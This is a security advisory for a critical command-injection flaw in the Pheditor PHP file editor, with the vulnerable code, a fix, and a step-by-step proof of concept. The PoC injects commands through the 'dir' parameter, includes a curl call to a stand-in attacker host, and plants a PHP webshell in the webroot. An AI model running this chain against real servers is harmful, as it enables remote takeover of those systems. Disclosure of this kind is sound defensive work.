PT-2026-48344 · Packagist · Pheditor/Pheditor
Published
2026-06-09
·
Updated
2026-06-09
·
CVE-2026-48030
CVSS v3.1
9.9
Critical
| Vector | AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
Summary
An OS Command Injection vulnerability in the terminal action handler allows any authenticated user to execute arbitrary OS commands by injecting shell metacharacters into the 'dir' POST parameter, completely bypassing the TERMINAL COMMANDS whitelist and achieving full Remote Code Execution with web server privileges.
Details
The terminal handler in pheditor.php accepts two POST parameters:
command and dir. Shell metacharacters are validated on $command only — $dir is passed to shell exec() without any sanitization.Vulnerable code (pheditor.php, line 554–586):
$command = $ POST['command']; // ✓ metacharacters checked
$dir = $ POST['dir']; // ✗ NOT checked — vulnerable
if (strpos($command, '&') !== false ||
strpos($command, ';') !== false ||
strpos($command, '||') !== false) {
die(...); // only guards $command, not $dir
}
$output = shell exec(
(empty($dir) ? null : 'cd ' . $dir . ' && ')
. $command . ' && echo ; pwd' // ← $dir injected here
);An attacker sends
dir=/tmp; curl attacker.com # — the semicolon in $dir is never checked, so the injected command executes freely.Fix: replace
$dir with escapeshellarg($dir) on line 586.PoC
Requirements: valid credentials, terminal permission enabled (default)
Step 1 — Authenticate:
curl -c cookies.txt -X POST http://TARGET/pheditor.php
-d "pheditor password=admin" -L > /dev/nullStep 2 — Get CSRF token:
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php |
grep -o 'token = "[a-f0-9]*"' |
grep -o '"[a-f0-9]*"' | tr -d '"')Step 3 — Confirm curl is blocked via command field:
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php
--data-urlencode "action=terminal"
--data-urlencode "token=$TOKEN"
--data-urlencode "command=curl https://ifconfig.me"
--data-urlencode "dir=/tmp"
→ {"error":true,"message":"Command not allowed"}Step 4 — Bypass whitelist via dir injection:
TOKEN=$(curl -s -b cookies.txt http://TARGET/pheditor.php |
grep -o 'token = "[a-f0-9]*"' |
grep -o '"[a-f0-9]*"' | tr -d '"')
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php
--data-urlencode "action=terminal"
--data-urlencode "token=$TOKEN"
--data-urlencode "command=ls"
--data-urlencode "dir=/tmp; curl -s https://ifconfig.me #"
→ {"error":false,"message":"OK","dir":"<PUBLIC IP>"}Step 5 — Full RCE via webshell:
curl -s -b cookies.txt -X POST http://TARGET/pheditor.php
--data-urlencode "action=terminal"
--data-urlencode "token=$TOKEN"
--data-urlencode "command=ls"
--data-urlencode "dir=/var/www/html; echo '<?php system($ GET["c"]);?>' > /var/www/html/shell.php #"
curl "http://TARGET/shell.php?c=id"
→ uid=33(www-data) gid=33(www-data) groups=33(www-data)Impact
OS Command Injection (CWE-78). Any authenticated pheditor user with terminal permission enabled (default configuration) is able to:
- Execute arbitrary OS commands as the web server user
- Bypass the TERMINAL COMMANDS whitelist entirely
- Deploy persistent PHP webshells to the webroot
- Read, write, or delete any file accessible to the web server
- Potentially compromise other applications on the same server
Fix
OS Command Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Pheditor/Pheditor